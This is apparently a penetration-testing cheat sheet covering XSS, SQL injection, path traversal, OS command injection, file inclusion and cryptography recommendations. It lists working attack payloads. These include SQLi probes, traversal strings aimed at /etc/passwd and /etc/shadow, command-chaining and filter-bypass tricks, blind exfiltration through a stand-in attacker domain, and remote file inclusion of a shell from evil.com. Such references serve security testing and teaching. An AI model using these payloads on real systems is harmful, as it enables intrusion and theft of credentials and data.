YevhSec

Types of XSS injections:

1)Stored - it is possible when a website or web application stores user input and later serves it to other users. An application is vulnerable if it does not validate user input before storing content and embedding it into HTML response pages.

2)Reflected - the attacker’s payload has to be a part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. Attackers use malicious links, phishing emails, and other social engineering techniques to lure the victim into making a request to the server.

3)DOM base - It is possible if the web application’s client-side scripts write data provided by the user to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and outputted to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.

4) Universal Cross-site Scripting - Unlike the common XSS attacks, UXSS is a type of attack that exploits client-side vulnerabilities in the browser or browser extensions in order to generate an XSS condition, and execute malicious code. When such vulnerabilities are found and exploited, the behavior of the browser is affected and its security features may be bypassed or disabled.

Vailable for manipulation:

Cookie

DOM

Connectivity

Async JS requests

Toolset: Acunteix, w3af, Beef

Basic payload:

Image payload:

HTML5 payload:

The SQL injection is one of the most common code injection technique that aims at getting access to the database. It's possible by improper handling of user input by the application.

Related to: -Language: SQL -Platform: Any (requires interaction with a SQL database)

Types of SQL injection:

Error based

Boolean based blind

Time based blind

Toolset: SQL Map

Detection

Detection of Error based SQL injection:

'

" 

# 

; 

)

Encoding:

%27

%22 

%23 

%3B

Multiple encoding:

%%2727

%%2222 

%%2323 

%%3B3B

Detection of Boolean based blind SQL injection:

TRUE statements:

aNd 1=1

aNd 21=21 

anD 1=1;// 

orDeR bY 1

FALSE statements:

dNd 0=1

anD 9=2 

anD 57=276;// 

ordEr bY 1000000000000

Characters to use instead of spaces:

+ 

/**/ 

%20

Comments to end the queries:

/*

// 

# 

%23 

--

Detection of Time based blind:

aNd sleep

SLEEP(15) 

BENCHMARK(100000000, rand()) 

WAIT FOR DELAY '00:00:15' 

WAIT FOR TIME '00:00:15'

Exploitation

General select syntax:

Notes:

When you executing queries you need to consider encodings.

Example of encoding query to utf8:

UniOn select table_name COLLATE utf8_general_ci,table_schema COLLATE utf8_general_ci,'1' from information_schema.tables

SQL Map

A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, such that characters representing "traverse to parent directory" are passed through to the file APIs.

Where to detect?

Check dynamic URL:

https://yevh.ye/img/loadImage?filename=ye.jpj

Check page elements:

<img src="/loadImage?filename=ye.jpj">

Basic checks:

..

../

..\

..../

....\/

....//

....\\

Encoding:

..%c0%af

..%252f

%2e%2e%2f

%252e%252e%252f

%c0%ae%c0%ae%c0%af

%uff0e%uff0e%u2215

%uff0e%uff0e%u2216

Expected base folder:

/var/www/images/../../../etc/passwd

Expected file extension:

/var/www/images/../../../etc/passwd%00.jpj

Popular servers path:

/var/www/   - Apache

/etc/nginx/ - NGINX

Linux interesting files:

/etc/passwd

/etc/shadow

/proc/self/environ

/etc/mysql/my.cnf

/proc/net/route

Windows interesting files:

\windows\win.ini

\inetpub\logs\logfiles

\Users\Administrator\NTUser.dat

\Administrator\NTUser.dat

\apache\logs\access.log

\apache\logs\error.log

\apache\php\php.ini

References

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.

Useful commands:

Linux:

whoami --- Name of current user.

uname -a --- Operating system.

ifconfig --- Network configuration.

netstat -an --- Network connections.

ps -ef --- Running processes.

Windows:

whoami --- Name of current user.

ver --- Operating system.

ipconfig /all --- Network configuration.

netstat -an --- Network connections.

tasklist --- Running processes.

Basic payloads:

  Note: VC = valid_command

VC ;ls  ---  Execute ls after VC

VC | ls  ---  Sends the output of VC as input to ls 

VC || ls ---  Executes ls iff VC returns a nonzero exit status(error) 

VC $(ls) ---  Sends the output of ls as arguments to VC 

VC `ls` ---  Sends the output of ls as arguments to VC

VC && ls --- Execute ls after, if VC return 0

Bypass Blacklisted words:

w'h'o'am'i 

w"h"o"am"I

w\ho\am\i

/\b\i\n/////s\h

Blind command injection payloads:

& ping -c 10 127.0.0.1 &

& whoami > /var/www/static/whoami.txt & 

& nslookup kgji2ohoyw.web-attacker.com & 

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

References:

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Can lead to:

Code execution on the web server.

Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting.

Denial of Service (DoS).

Sensitive Information Disclosure.

Types:

Local File Inclusion(LFI) - is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.

Remote File Inclusion(RFI) - occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

Basic payloads LFI:

http://example.com/index.php?page=../../../etc/passwd

http://example.com/index.php?page=../../../etc/passwd%00 

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Basic payloads RFI:

http://example.com/index.php?page=http://evil.com/shell.txt

http://example.com/index.php?page=http://evil.com/shell.txt%00 

http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

References

In this sheet presented cryptographic recommendation and libraries to use.

Recommendations:

Key exchange: Diffie–Hellman key exchange with minimum 2048 bits

Message Integrity: HMAC-SHA2

Message Hash: SHA2 256 bits

Assymetric encryption: RSA 2048 bits

Symmetric-key algorithm: AES 128 bits

Password Hashing: Argon2, PBKDF2, Scrypt, Bcrypt

Recommended libraries:

Python: MbedTLS, Libsodium, PyNaCl, Libnacl.

Ruby: Nacl, djb's.

JS: Crypto-js.

Go: Crypto.

Java: Java.security, Javax.crypto.

PHP: Hash, OpenSSL.

C/C++: OpenSSL.

Do not use:

C: random(), rand() ----> getrandom(2) 

Java: java.util.Random() ----> java.security.SecureRandom

PHP: rand() or mt_rand() ----> random_int() or random_bytes()

References: